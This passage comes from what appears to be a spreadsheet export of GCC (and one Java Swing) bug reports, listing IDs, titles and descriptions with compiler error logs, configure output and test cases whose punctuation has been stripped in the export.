Making changes programmatically like calling hide() on the JInternalFrame also
don't show up until the JFrame is resized (enlarged).
***TESTCASE***
import java.io.*
import java.awt.*
import javax.swing.*
public class Test
{
  public static void main(String[] args) throws IOException
  {
    JFrame jf = new JFrame(title1)
    jf.setSize(600600)
    jf.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    JInternalFrame frame = new JInternalFrame(title2 true true true true)
    jf.setContentPane(frame)
    frame.show()
    jf.show()
  }
}</t>
  </si>
  <si>
    <t>GCC-31341</t>
  </si>
  <si>
    <t xml:space="preserve">testsuite pr31041.c fails conflicting with </t>
  </si>
  <si>
    <t>gcc.dg/vect/pr31041 attempts to redefine int32_t while  is in scope so test reports FAIL.  Is this the intent of the test?</t>
  </si>
  <si>
    <t>GCC-49398</t>
  </si>
  <si>
    <t>[4.7 Regression] bootstrap broken for arm-linux-gnueabi with thumb mode.</t>
  </si>
  <si>
    <t>Created attachment 24513
Original test case.
Originally found by Michael Hope's bootstrap builds . 
Rev 174940 appears to break bootstrap for --target=arm-linux-gnueabi --with-cpu=cortex-a9 --with-fpu=neon --with-float=softfp --with-mode=thumb. 
Bootstrap fails during the build of libiberty - from Michaels' logs here. 
http://builds.linaro.org/toolchain/gcc-4.7~svn174981/logs/armv7l-maverick-cbuild130-ursa4-cortexa9r1/gcc-build.txt
Bisecting using a cross-compiler lead me to this revision.
The cross-compiler was configured as follows : 
/home/ramrad01/sources/fsf/trunk/configure --target=arm-linux-gnueabi --with-cpu=cortex-a9 --with-fpu=neon --with-float=softfp --enable-languages=c
ramrad01@e102742:/work/cross-build/build-174940/gcc$ !./xgcc
./xgcc -B`pwd` -mthumb -g -O2  ~/Downloads/regex.i  -S
../../../gcc-4.7~/libiberty/regex.c: In function â€˜xre_search_2â€™:
../../../gcc-4.7~/libiberty/regex.c:4961:1: internal compiler error: in cselib_record_set at cselib.c:2224
Please submit a full bug report
with preprocessed source if appropriate.
ramrad01@e102742:/work/cross-build/build-174938/gcc$ !./xgcc
./xgcc -B`pwd` -mthumb -g -O2  ~/Downloads/regex.i  -S
ICE disappears without -g - (So not sure if 174940 is the cause or it just appears to trigger it) . 
cheers
Ramana</t>
  </si>
  <si>
    <t>GCC-1185</t>
  </si>
  <si>
    <t>Another parallel build error</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: I checked in a fix for this.
    Could you give it a try?
</t>
  </si>
  <si>
    <t>GCC-70135</t>
  </si>
  <si>
    <t>-fsanitize=undefined causes static_assert to fail</t>
  </si>
  <si>
    <t>Created attachment 37894
unreduced testcase
markus@x4 build % g++ -O2 comparing.ii
markus@x4 build % clang++ -std=c++14 -O2 comparing.ii
markus@x4 build % clang++ -fsanitize=undefined -std=c++14 -O2 comparing.ii
markus@x4 build % g++ -fsanitize=undefined -O2 comparing.ii
../example/comparing.cpp: In function â€˜int main()â€™:
../example/comparing.cpp:26:5: error: static assertion failed
     static_assert(grouped == hana::make_tuple(
     ^~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-63894</t>
  </si>
  <si>
    <t>[5 Regression] ICE in inline_call at ipa-inline-transform.c:339 building Firefox</t>
  </si>
  <si>
    <t>Executing: ../../../../gcc_test/usr/local/bin/c++ -o js -Wall -Wignored-qualifiers -Wsign-compare -Wtype-limits -Werror=char-subscripts -Werror=comment -Werror=empty-body -Werror=endif-labels -Werror=int-to-pointer-cast -Werror=missing-braces -Werror=overloaded-virtual -Werror=pointer-arith -Werror=reorder -Werror=return-type -Werror=sequence-point -Werror=switch -Werror=trigraphs -Werror=unknown-pragmas -Werror=unused-label -Werror=unused-value -Werror=write-strings -Werror=conversion-null -Wno-invalid-offsetof -Wcast-align -flto=64 --param lto-partitions=64 -mcpu=power7 -fno-semantic-interposition -ffunction-sections -fdata-sections -fno-rtti -fno-exceptions -fno-math-errno -std=gnu++0x -pthread -pipe -DNDEBUG -DTRIMMED -O3 -fomit-frame-pointer /home/trippels/moz-build-dir/js/src/shell/tmpKUuVPB.list -lpthread -Wl--hash-style=gnu--as-needed--gc-sections--icf=all -Wl-znoexecstack -Wl-ztext -Wl--build-id -Wl-rpath-link../../../dist/bin -Wl-rpath-link/home/trippels/moz-build-dir/dist/lib ../libjs_static.a -rdynamic ../../../nsprpub/lib/ds/libplds4.so ../../../nsprpub/lib/libc/src/libplc4.so ../../../nsprpub/pr/src/libnspr4.so -lm -ldl -lffi -lz -lm -ldl
/home/trippels/moz-build-dir/js/src/shell/tmpKUuVPB.list:
    INPUT(OSObject.o)
    INPUT(js.o)
    INPUT(jsheaptools.o)
    INPUT(jsoptparse.o)
    INPUT(../editline/editline.o)
    INPUT(../editline/sysunix.o)
    INPUT(../../../mozglue/build/dummy.o)
    INPUT(../../../mfbt/Compression.o)
    INPUT(../../../mfbt/Decimal.o)
    INPUT(../../../mfbt/FloatingPoint.o)
    INPUT(../../../mfbt/HashFunctions.o)
    INPUT(../../../mfbt/JSONWriter.o)
    INPUT(../../../mfbt/Poison.o)
    INPUT(../../../mfbt/SHA1.o)
    INPUT(../../../mfbt/TaggedAnonymousMemory.o)
    INPUT(../../../mfbt/bignum-dtoa.o)
    INPUT(../../../mfbt/bignum.o)
    INPUT(../../../mfbt/cached-powers.o)
    INPUT(../../../mfbt/diy-fp.o)
    INPUT(../../../mfbt/double-conversion.o)
    INPUT(../../../mfbt/fast-dtoa.o)
    INPUT(../../../mfbt/fixed-dtoa.o)
    INPUT(../../../mfbt/strtod.o)
    INPUT(../../../mfbt/unused.o)
lto1: internal compiler error: in inline_call at ipa-inline-transform.c:339
0x10d422df inline_call(cgraph_edge* bool vec* int* bool bool*)
        ../../gcc/gcc/ipa-inline-transform.c:334
0x10d3b9d7 inline_small_functions
        ../../gcc/gcc/ipa-inline.c:1827
0x10d3b9d7 ipa_inline
        ../../gcc/gcc/ipa-inline.c:2198
0x10d3b9d7 execute
        ../../gcc/gcc/ipa-inline.c:2568
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: ../../../../gcc_test/usr/local/bin/c++ returned 1 exit status
compilation terminated.
/home/trippels/bin/ld: fatal error: lto-wrapper failed
collect2: error: ld returned 1 exit status
make[1]: *** [js] Error 1
adding -r -nostdlib to the invocation triggers another ICE:
lto1: internal compiler error: in update_visibility_by_resolution_info at ipa-visibility.c:427
(gdb) l
422              next != node next = next-&gt;same_comdat_group)
423           gcc_assert (!next-&gt;externally_visible
424                       || define == (next-&gt;resolution == LDPR_PREVAILING_DEF_IRONLY
425                                     || next-&gt;resolution == LDPR_PREVAILING_DEF
426                                     || next-&gt;resolution == LDPR_UNDEF
427                                     || next-&gt;resolution == LDPR_PREVAILING_DEF_IRONLY_EXP))
428
429       if (node-&gt;same_comdat_group)
430         for (symtab_node *next = node-&gt;same_comdat_group
431              next != node next = next-&gt;same_comdat_group)
(gdb) p next-&gt;externally_visible
$1 = 1
(gdb) p define
$2 = true
(gdb) p next-&gt;resolution
$3 = LDPR_PREVAILING_DEF
I will try to reduce this issue.</t>
  </si>
  <si>
    <t>GCC-47503</t>
  </si>
  <si>
    <t>[4.6 Regression] [C++0x] ICE: in adjust_temp_type at cp/semantics.c:5876 with -fno-elide-constructors</t>
  </si>
  <si>
    <t>Created attachment 23147
reduced testcase
Compiler output:
$ gcc -std=c++0x -fno-elide-constructors testcase.C 
testcase.C: In constructor 'B::B(A&amp;)':
testcase.C:10:20:   in constexpr expansion of '((B*)this)-&gt;B::a.A::A((*(const A*)aa))'
testcase.C:10:20: internal compiler error: in adjust_temp_type at cp/semantics.c:5876
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r169326 - crash
4.5 r168785 - OK</t>
  </si>
  <si>
    <t>GCC-444</t>
  </si>
  <si>
    <t>Optimised compile of template class calling htonl fails</t>
  </si>
  <si>
    <t>With optimisation switched on the htonl function (from 
) is defined as a byteswap macro that includes
some asm commands.  If htonl is included in a class template
the compiler generates errors compiling the asm.  If htonl
is in a normal class or function no error occurs.  The 
example generates the error messages -
htonltest.C: In method `test1::test1()':
htonltest.C:29:   instantiated from here
htonltest.C:8: `volatile' undeclared (first use this function)
htonltest.C:8: (Each undeclared identifier is reported only once
htonltest.C:8: for each function it appears in.)
htonltest.C:8: warning:  qualifier ignored on asm
If htonl is commented out in the template class only
the example will compile without error
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Redhat V6.2 linux on intel PC
How-To-Repeat:
Example code -
#include 
template  class test1 {
public:
   test1() {
      int i=n
      j = htonl(i)
   }
private:
   int j
}
class test2 {
public:
   test2(int n) {
      int i=n
      j = htonl(i)
   }
private:
   int j
}
int main() {
   test2 t(5)
   test1 t5
   int i=1
   int j = htonl(i)
   return(j)
}</t>
  </si>
  <si>
    <t>ed.rice</t>
  </si>
  <si>
    <t>GCC-58413</t>
  </si>
  <si>
    <t>ubsan constant folding</t>
  </si>
  <si>
    <t>variable-sized object may not be initialized
  unsigned short x[128 &gt;&gt; 5] = {}
initializer element is not constant
  static int x = ((int)( 0x00000000 | ((31 
(yes auch)
unexpected size of type 'long long unsigned int:40'
  uint64_t start_of_buffer = ((res.ptr.s.addr &gt;&gt; 7) - res.ptr.s.back) &lt;&lt; 7 
   .addr and .back are bitfield members of struct s. ptr is a pointer to an union.
case label does not reduce to an integer constant
switch(int)
...
   case (1&lt;&lt;1):
    ..
They all seem related.
Thanks!</t>
  </si>
  <si>
    <t>GCC-50448</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7 Regression] Missed optimization accessing struct component with integer address</t>
  </si>
  <si>
    <t>typedef struct
{
    unsigned char abcd
} SPI_t
#define SPIE (*(SPI_t volatile*) 0x0AC0)
void foo (void)
{
    SPIE.d = 0xAA
    while (!(SPIE.c 
    SPIE.d = 0xBB
    while (!(SPIE.c 
}
avr-gcc-4.6.1 -Os -S -fdump-tree-optimized -fdump-rtl-expand 
compiles that code to
foo:
	ldi r24lo8(-86)
	ldi r30lo8(2752)
	ldi r31hi8(2752)
	std Z+3r24
.L2:
	lds r242754
	sbrs r247
	rjmp .L2
	ldi r24lo8(-69)
	ldi r30lo8(2752)
	ldi r31hi8(2752)
	std Z+3r24
.L3:
	lds r242754
	sbrs r247
	rjmp .L3
	ret
Instead of loading the address 2752 two times it's sufficient to load it once or to do a direct access to 2755 and avoid loading the constant altogether.
The load appeard first in .expand .optimized looks fine:
foo ()
{
  signed char D.1932
  volatile unsigned char D.1931
  signed char D.1930
  volatile unsigned char D.1929
:
  MEM[(volatile struct SPI_t *)2752B].d ={v} 170
:
  D.1929_3 ={v} MEM[(volatile struct SPI_t *)2752B].c
  D.1930_4 = (signed char) D.1929_3
  if (D.1930_4 &gt;= 0)
    goto 
  else
    goto 
:
  MEM[(volatile struct SPI_t *)2752B].d ={v} 187
:
  D.1931_7 ={v} MEM[(volatile struct SPI_t *)2752B].c
  D.1932_8 = (signed char) D.1931_7
  if (D.1932_8 &gt;= 0)
    goto 
  else
    goto 
:
  return
}</t>
  </si>
  <si>
    <t>GCC-66332</t>
  </si>
  <si>
    <t>goacc/acc_on_device-2.c scan-rtl-dump-times expand testsuite failure</t>
  </si>
  <si>
    <t>Hi
I'm getting the following openacc-related testsuite error for gcc-5.1.0 on an x86_64-pc-linux-gnu system:
FAIL: c-c++-common/goacc/acc_on_device-2.c scan-rtl-dump-times expand \\(call [^\\n]* acc_on_device 0
This failure does not appear to be related to BUG 64850.
The failure occurs in gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:27
  1 /* Have to enable optimizations as otherwise builtins won't be expanded.  */
  2 /* { dg-additional-options -O -fdump-rtl-expand } */
  3 
  4 #if __cplusplus
  5 extern C {
  6 #endif
  7 
  8 typedef enum acc_device_t { acc_device_X = 123 } acc_device_t
  9 extern int acc_on_device (acc_device_t)
 10 
 11 #if __cplusplus
 12 }
 13 #endif
 14 
 15 int
 16 f (void)
 17 {
 18   const acc_device_t dev = acc_device_X
 19   return acc_on_device (dev)
 20 }
 21 
 22 /* With -fopenacc we're expecting the builtin to be expanded so no calls.
 23    TODO: in C++ even under extern C the use of enum for acc_device_t
 24    perturbs expansion as a builtin which expects an int parameter.  It's fine
 25    when changing acc_device_t to plain int but that's not what we're doing in
 26    .
 27    { dg-final { scan-rtl-dump-times \\\(call \[^\\n\]* acc_on_device 0 expand { xfail c++ } } } */
 28
 29 /* { dg-final { cleanup-rtl-dump expand } } */
Running:
/home/pkgbase/bld/gcc.5.1.0-x86_64-build4/build/gcc/xgcc -B/home/pkgbase/bld/gcc.5.1.0-x86_64-build4/build/gcc/ /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c -fno-diagnostics-show-caret -fdiagnostics-color=never -fopenacc -O -fdump-rtl-expand -ffat-lto-objects -S -o acc_on_device-2.s
I get (acc_on_device-2.s):
  1         .file   acc_on_device-2.c
  2         .text
  3         .globl  f
  4         .type   f @function
  5 f:
  6 .LFB0:
  7         .cfi_startproc
  8         subq    $8 %rsp
  9         .cfi_def_cfa_offset 16
 10         movl    $123 %edi
 11         call    acc_on_device
 12         addq    $8 %rsp
 13         .cfi_def_cfa_offset 8
 14         ret
 15         .cfi_endproc
 16 .LFE0:
 17         .size   f .-f
 18         .ident  GCC: (GNU) 5.1.0
 19         .section        .note.GNU-stack@progbits
and (acc_on_device-2.c.191r.expand):
  1
  2  Function f (f funcdef_no=0 decl_uid=1846 cgraph_uid=0 symbol_order=0)
  3
  4
  5  Generating RTL for gimple basic block 2
  6
  7
  8 try_optimize_cfg iteration 1
  9
 10 Merging block 3 into block 2...
 11 Merged blocks 2 and 3.
 12 Merged 2 and 3 without moving.
 13 Removing jump 11.
 14 Merging block 4 into block 2...
 15 Merged blocks 2 and 4.
 16 Merged 2 and 4 without moving.
 17
 18
 19 try_optimize_cfg iteration 2
 20
 21
 22
 23 
 24  Full RTL generated for this function:
 25 
 26 (note 1 0 3 NOTE_INSN_DELETED)
 27 (note 3 1 2 2 [bb 2] NOTE_INSN_BASIC_BLOCK)
 28 (note 2 3 5 2 NOTE_INSN_FUNCTION_BEG)
 29 (insn 5 2 6 2 (set (reg:SI 5 di)
 30         (const_int 123 [0x7b])) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:19 -1
 31      (nil))
 32 (call_insn/u 6 5 7 2 (set (reg:SI 0 ax)
 33         (call (mem:QI (symbol_ref:DI (acc_on_device) [flags 0x41]  ) [0 __builtin_acc_on_device S1 A8])
 34             (const_int 0 [0]))) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:19 -1
 35      (expr_list:REG_EH_REGION (const_int 0 [0])
 36         (nil))
 37     (expr_list:SI (use (reg:SI 5 di))
 38         (nil)))
 39 (insn 7 6 8 2 (set (reg:SI 89)
 40         (reg:SI 0 ax)) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:19 -1
 41      (nil))
 42 (insn 8 7 9 2 (set (reg:SI 90)
 43         (reg:SI 89)) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:19 -1
 44      (nil))
 45 (insn 9 8 10 2 (set (reg:SI 87 [ D.1855 ])
 46         (reg:SI 90)) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:19 -1
 47      (nil))
 48 (insn 10 9 14 2 (set (reg:SI 88 [  ])
 49         (reg:SI 87 [ D.1855 ])) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:19 -1
 50      (nil))
 51 (insn 14 10 15 2 (set (reg/i:SI 0 ax)
 52         (reg:SI 88 [  ])) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:20 -1
 53      (nil))
 54 (insn 15 14 0 2 (use (reg/i:SI 0 ax)) /home/pkgbase/bld/gcc.5.1.0-x86_64-build4/gcc-5.1.0/gcc/testsuite/c-c++-common/goacc/acc_on_device-2.c:20 -1
 55      (nil))
The test fails because the (call .. regexp should not occur with -fopenacc (the '0' argument to scan-rtl-dump-times at acc_on_device-2.c:27) but it is apparently detected on at acc_on_device-2.c.191r.expand:33.
Unfortunately I haven't the slightest idea about what is going on with this test but am wondering if it is serious or not.
thanks much for your time and work
John Stanley</t>
  </si>
  <si>
    <t>GCC-11293</t>
  </si>
  <si>
    <t>Failure to configure on Solaris 2.8: error: *** unable to determine endianness</t>
  </si>
  <si>
    <t>Brand new 3.3 install gives this error during configure.
I believe this could be a repeat of bug 7980 which was closed (unable to 
reproduce).
/tmp/gccbld &gt;/home/williami/bld/gcc-3.3/configure --prefix=/home/williami
Configuring for a sparc-sun-solaris2.8 host.
Created Makefile in /tmp/gccbld using mh-frag
./config.status is unchanged
Configuring libiberty...
loading cache ../config.cache
checking whether to enable maintainer-specific portions of Makefiles... no
checking for makeinfo... no
checking for perl... (cached) perl
checking host system type... sparc-sun-solaris2.8
checking build system type... sparc-sun-solaris2.8
checking for ar... (cached) ar
checking for ranlib... (cached) ranlib
checking for gcc... (cached) CC
checking whether we are using GNU C... (cached) no
checking whether CC and cc understand -c and -o together... (cached) no
checking for POSIXized ISC... no
checking for working const... (cached) no
checking for inline... (cached) inline
checking for a BSD compatible install... /home/williami/bld/gcc-
3.3/libiberty/../install-sh -c
xhost-mkfrag is unchanged
checking how to run the C preprocessor... (cached) CC -E
checking for sys/file.h... (cached) yes
checking for sys/param.h... (cached) yes
checking for limits.h... (cached) yes
checking for stdlib.h... (cached) yes
checking for string.h... (cached) yes
checking for unistd.h... (cached) yes
checking for strings.h... (cached) yes
checking for sys/time.h... (cached) yes
checking for time.h... (cached) yes
checking for sys/resource.h... (cached) yes
checking for sys/stat.h... (cached) yes
checking for sys/mman.h... (cached) yes
checking for fcntl.h... (cached) yes
checking for alloca.h... (cached) yes
checking for sys/pstat.h... (cached) no
checking for sys/sysmp.h... (cached) no
checking for sys/sysinfo.h... (cached) yes
checking for machine/hal_sysinfo.h... (cached) no
checking for sys/table.h... (cached) no
checking for sys/sysctl.h... (cached) no
checking for sys/systemcfg.h... (cached) no
checking for sys/wait.h that is POSIX.1 compatible... (cached) yes
checking whether time.h and sys/time.h may both be included... (cached) yes
checking whether errno must be declared... (cached) no
checking for ANSI C header files... (cached) no
checking for uintptr_t... (cached) yes
checking for pid_t... (cached) yes
checking whether the C compiler (CC -g ) works... yes
checking whether the C compiler (CC -g ) is a cross-compiler... no
checking for asprintf... (cached) no
checking for atexit... (cached) no
checking for basename... (cached) no
checking for bcmp... (cached) no
checking for bcopy... (cached) no
checking for bsearch... (cached) no
checking for bzero... (cached) no
checking for calloc... (cached) no
checking for clock... (cached) no
checking for ffs... (cached) no
checking for getcwd... (cached) no
checking for getpagesize... (cached) no
checking for index... (cached) no
checking for insque... (cached) no
checking for memchr... (cached) no
checking for memcmp... (cached) no
checking for memcpy... (cached) no
checking for memmove... (cached) no
checking for memset... (cached) no
checking for mkstemps... (cached) no
checking for putenv... (cached) no
checking for random... (cached) no
checking for rename... (cached) no
checking for rindex... (cached) no
checking for setenv... (cached) no
checking for sigsetmask... (cached) no
checking for strcasecmp... (cached) no
checking for strchr... (cached) no
checking for strdup... (cached) no
checking for strncasecmp... (cached) no
checking for strrchr... (cached) no
checking for strstr... (cached) no
checking for strtod... (cached) no
checking for strtol... (cached) no
checking for strtoul... (cached) no
checking for tmpnam... (cached) no
checking for vasprintf... (cached) no
checking for vfprintf... (cached) no
checking for vprintf... (cached) no
checking for vsprintf... (cached) no
checking for waitpid... (cached) no
checking whether alloca needs Cray hooks... (cached) no
checking stack direction for C alloca... (cached) -1
checking for vfork.h... (cached) no
checking for working vfork... (cached) no
checking for _doprnt... (cached) no
checking for sys_errlist... (cached) yes
checking for sys_nerr... (cached) yes
checking for sys_siglist... (cached) no
checking for _system_configuration... (cached) no
checking for getrusage... (cached) no
checking for on_exit... (cached) no
checking for psignal... (cached) no
checking for strerror... (cached) no
checking for strsignal... (cached) no
checking for sysconf... (cached) no
checking for times... (cached) no
checking for sbrk... (cached) no
checking for gettimeofday... (cached) no
checking for pstat_getstatic... (cached) no
checking for pstat_getdynamic... (cached) no
checking for sysmp... (cached) no
checking for getsysinfo... (cached) no
checking for table... (cached) no
checking for sysctl... (cached) no
checking for unistd.h... (cached) yes
checking for getpagesize... (cached) no
checking for working mmap... (cached) no
checking for working strncmp... (cached) no
creating ./config.status
creating Makefile
creating testsuite/Makefile
creating config.h
config.h is unchanged
Configuring zlib...
loading cache ../config.cache
checking host system type... sparc-sun-solaris2.8
checking target system type... sparc-sun-solaris2.8
checking build system type... sparc-sun-solaris2.8
checking for a BSD compatible install... /home/williami/bld/gcc-
3.3/zlib/../install-sh -c
checking whether build environment is sane... yes
checking whether make sets ${MAKE}... (cached) yes
checking for working aclocal... missing
checking for working autoconf... missing
checking for working automake... missing
checking for working autoheader... missing
checking for working makeinfo... missing
checking whether to enable maintainer-specific portions of Makefiles... no
checking for gcc... (cached) CC
checking whether we are using GNU C... (cached) no
checking for non-GNU ld... (cached) /usr/ccs/bin/ld
checking if the linker (/usr/ccs/bin/ld) is GNU ld... (cached) no
checking for /usr/ccs/bin/ld option to reload object files... (cached) -r
checking for BSD-compatible nm... (cached) /usr/ccs/bin/nm -p
checking whether ln -s works... (cached) yes
checking how to recognise dependant libraries... (cached) pass_all
checking for object suffix... (cached) o
checking for ranlib... (cached) ranlib
checking for strip... (cached) strip
loading cache ../config.cache within ltconfig
checking for objdir... .libs
checking for CC option to produce PIC...  -KPIC -DPIC
checking if CC PIC flag  -KPIC -DPIC works... (cached) yes
checking if CC static flag -Bstatic works... (cached) yes
finding the maximum length of command line arguments... (cached) 393217
checking if CC supports -c -o file.o... (cached) yes
checking whether the linker (/usr/ccs/bin/ld) supports shared libraries... yes
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... no
checking dynamic linker characteristics... solaris2.8 ld.so
checking command to parse /usr/ccs/bin/nm -p output... ok
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... yes
creating libtool
loading cache ../config.cache
checking how to run the C preprocessor... (cached) CC -E
checking for stdlib.h... (cached) yes
checking for unistd.h... (cached) yes
checking for sys/stat.h... (cached) yes
checking for sys/types.h... (cached) yes
checking for getpagesize... (cached) no
checking for working mmap... (cached) no
checking for memcpy... (cached) no
checking for strerror... (cached) no
checking for unistd.h... (cached) yes
creating ./config.status
creating Makefile
Configuring gcc...
loading cache ../config.cache
checking LIBRARY_PATH variable... ok
checking GCC_EXEC_PREFIX variable... ok
checking host system type... sparc-sun-solaris2.8
checking target system type... sparc-sun-solaris2.8
checking build system type... sparc-sun-solaris2.8
checking for gcc... (cached) CC
checking whether the C compiler (CC -g ) works... yes
checking whether the C compiler (CC -g ) is a cross-compiler... no
checking whether we are using GNU C... (cached) no
checking whether CC accepts -g... yes
checking whether CC and cc understand -c and -o together... (cached) no
checking for gnatbind... no
checking for compiler driver that understands Ada... no
checking whether CC accepts -Wno-long-long... yes
checking how to run the C preprocessor... (cached) CC -E
checking for inline... (cached) inline
checking for volatile... yes
checking for long double... yes
checking for long long int... yes
checking for __int64... no
checking for built-in _Bool... no
checking size of short... 2
checking size of int... 4
checking size of long... 4
checking size of long long... 8
checking execution character set... ASCII
checking whether make sets ${MAKE}... (cached) yes
checking whether a default assembler was specified... no
checking whether a default linker was specified... no
checking for GNU C library... no
checking for gawk... gawk
checking whether ln works... yes
checking whether ln -s works... yes
checking for ranlib... (cached) ranlib
checking for a BSD compatible install... /home/williami/bld/gcc-
3.3/gcc/../install-sh -c
checking for ANSI C header files... (cached) no
checking whether time.h and sys/time.h may both be included... (cached) yes
checking for working stdbool.h... no
checking whether string.h and strings.h may both be included... yes
checking for sys/wait.h that is POSIX.1 compatible... (cached) yes
checking for limits.h... (cached) yes
checking for stddef.h... yes
checking for string.h... (cached) yes
checking for strings.h... (cached) yes
checking for stdlib.h... (cached) yes
checking for time.h... (cached) yes
checking for fcntl.h... (cached) yes
checking for unistd.h... (cached) yes
checking for sys/file.h... (cached) yes
checking for sys/time.h... (cached) yes
checking for sys/resource.h... (cached) yes
checking for sys/param.h... (cached) yes
checking for sys/times.h... yes
checking for sys/stat.h... (cached) yes
checking for direct.h... no
checking for malloc.h... yes
checking for langinfo.h... yes
checking for thread.h... yes
checking for pthread.h... yes
checking for CHAR_BIT... yes
checking byte ordering... unknown
configure: error: *** unable to determine endianness
Configure in /tmp/gccbld/gcc failed exiting.
/tmp/gccbld &gt;uname -a
SunOS otcdv2 5.8 Generic_108528-20 sun4u sparc SUNWUltra-Enterprise</t>
  </si>
  <si>
    <t>ivor.williams</t>
  </si>
  <si>
    <t>GCC-48259</t>
  </si>
  <si>
    <t>Internal compiler errors in lto1</t>
  </si>
  <si>
    <t>I just experimented a bit with static libstdc++ compiled with -flto. GCC fails with internal compiler errors when using it. (Linking with static libgcc compiled with -flto also reveals a bug in the linker.)
Does it make sense to report such bugs? Or maybe these libraries are too 'special' and can't be expected to work this way?</t>
  </si>
  <si>
    <t>GCC-18020</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] rejects valid definition of enum value in template</t>
  </si>
  <si>
    <t>Here we go:
gmorin@linux:~&gt; cat foo.cpp
template 
struct bar {
    enum {
        MASK = ((1 &lt;&lt; 17)-1)
         IT_MASK = (~MASK)
         ITERATION_INC = (MASK+1)
    }
}
int baz = bar::IT_MASK
gmorin@linux:~&gt; g++ -o /dev/null -c foo.cpp
foo.cpp: In instantiation of `bar':
foo.cpp:10:   instantiated from here
foo.cpp:3: error: enumerator value for `IT_MASK' not integer constant
gmorin@linux:~&gt; gcc -v
Reading specs from /openpkg/lib/gcc/i686-pc-linux-gnu/3.4.2/specs
Configured with: ../configure --cache-file=./config.cache
--srcdir=/openpkg/RPM/TMP/gcc-3.4.2/obj/.. --prefix=/openpkg
--exec-prefix=/openpkg --includedir=/openpkg/include/gcc
--libexecdir=/openpkg/libexec/gcc --with-gxx-include-dir=/openpkg/include/g++
--with-local-prefix=/openpkg/lib/gcc --enable-languages=cc++
--enable-threads=posix --disable-maintainer-mode --disable-shared --disable-nls
--with-gnu-ld --with-ld=/openpkg/bin/ld --with-gnu-as --with-as=/openpkg/bin/as
Thread model: posix
gcc version 3.4.2 (OpenPKG-CURRENT)
gmorin@linux:~&gt; uname -a
Linux linux 2.4.21-99-smp4G #1 SMP Wed Sep 24 14:13:20 UTC 2003 i686 athlon i386
GNU/Linux
This is a Suse 9.0 with gcc from CURRENT OpenPKG. It works if you remove the
template declaration.</t>
  </si>
  <si>
    <t>guillaume</t>
  </si>
  <si>
    <t>GCC-65235</t>
  </si>
  <si>
    <t>Simplifying vec_select of vec_concat miscompiles when first element of vec_concat is const_int</t>
  </si>
  <si>
    <t>This aarch64 intrinsics testcase aborts.
#include arm_neon.h
int main (int argc char** argv)
{
  int64x1_t val1
  int64x1_t val2
  int64x1_t val3
  uint64x1_t val13
  uint64x2_t val14
  uint64_t got
  uint64_t exp
  val1 = vcreate_s64(UINT64_C(0xffffffff80008000))
  val2 = vcreate_s64(UINT64_C(0x0000f38d00000000))
  val3 = vcreate_s64(UINT64_C(0xffff7fff0000809b))
  //  Expect: val13 = 8000000000001553
  val13 = vcreate_u64 (UINT64_C(0x8000000000001553))
  //  Expect: val14 = 0010 0000 0000 0002 0000 0000 0000 0000
  val14 = vcombine_u64(vcgt_s64(vqrshl_s64(val1 val2)
				vshr_n_s64(val3 18))
		       vshr_n_u64(val13 11))
  /* Should be 0000000000000000.  */
  got = vgetq_lane_u64(val14 0)
  exp = 0
  if(exp != got)
    __builtin_abort ()
}
Investigation shows that the problem is in the simplify-rtx machinery:
Combine tries to combine:
 (insn 72 71 73 2 (set (reg:V2DI 117 [ D.18177 ])
         (vec_concat:V2DI (reg:DI 176 [ D.18179 ])
           (reg:DI 114 [ D.18168 ]))) 
      (expr_list:REG_DEAD (reg:DI 176 [ D.18179 ])
      (expr_list:REG_DEAD (reg:DI 114 [ D.18168 ])
and
 (insn 104 102 105 2 (set (reg:DI 193 [ D.18168 ])
         (vec_select:DI (reg:V2DI 117 [ D.18177 ])
             (parallel [
                     (const_int 0 [0])
                 ])))
      (expr_list:REG_DEAD (reg:V2DI 117 [ D.18177 ])
         (nil)))
but ends up generating:
(set (reg:DI 193 [ D.18168 ])
    (reg:DI 114 [ D.18168 ]))
i.e. it picks element 1 instead of the requested element 0.
This happens during combine where it tries to to simplify a vec_select 0 of the intermediate rtx:
(vec_concat:V2DI (const_int -1 [0xffffffffffffffff])
    (reg:DI 114 [ D.18166 ]))
The relevant code in simplify-rtx has been there for some time and is broken for all release branches. I have a patch in testing...</t>
  </si>
  <si>
    <t>GCC-40850</t>
  </si>
  <si>
    <t>double free in nested types with allocatable components</t>
  </si>
  <si>
    <t>The attached code produces an error at runtime:
System:
Linux 2.6.27-gentoo-r8 x86_64 AMD Turion(tm) 64 Mobile Technology ML-32
AuthenticAMD GNU/Linux
$ gfortran bug.f90 -o bug
$ ./bug
*** glibc detected *** ./bug: double free or corruption (fasttop):
0x000000000060a5b0 ***
======= Backtrace: =========
/lib/libc.so.6[0x7f516d97a468]
/lib/libc.so.6(cfree+0x76)[0x7f516d97bfa6]
